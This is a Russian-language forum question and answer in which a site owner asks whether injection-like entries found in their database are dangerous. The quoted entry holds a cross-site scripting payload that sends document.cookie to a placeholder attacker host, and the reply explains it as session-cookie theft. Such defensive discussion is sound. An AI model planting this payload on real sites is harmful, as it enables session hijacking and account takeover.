Кросс-атаки на сайты похожи в моей базе данных
Я только что нашел в своей базе данных что-то похожее на попытки инъекции. Мне интересно, могут ли они сделать что-нибудь вредоносное для моей базы данных или нет. Благодарю.
Your search for 'flowers evil_script()' returned the following results:evil_script()' returned the following results
Window.location='http:attacker?cookie='+document.cookie.
Решение
@jessica, мне кажется, что скрипт пытается перенаправить пользователя на сайт злоумышленников вместе с cookie. это мог использоваться, чтобы попытаться украсть сеансовый cookie пользователя и, по сути, войти в систему под этим пользователем.
Если действующим пользователем является администратор или кто-то с повышенными привилегиями, злоумышленник будет иметь те же права, что и этот пользователь.
Мне было бы любопытно, если бы вы могли найти настоящий скрипт где-нибудь в вашей базе данных (файлы сайта) или кто-то просто выполнил поиск на вашем сайте и получил ошибку.
Это было найдено в журнале регистрации?
Другие решения
Других решений пока нет …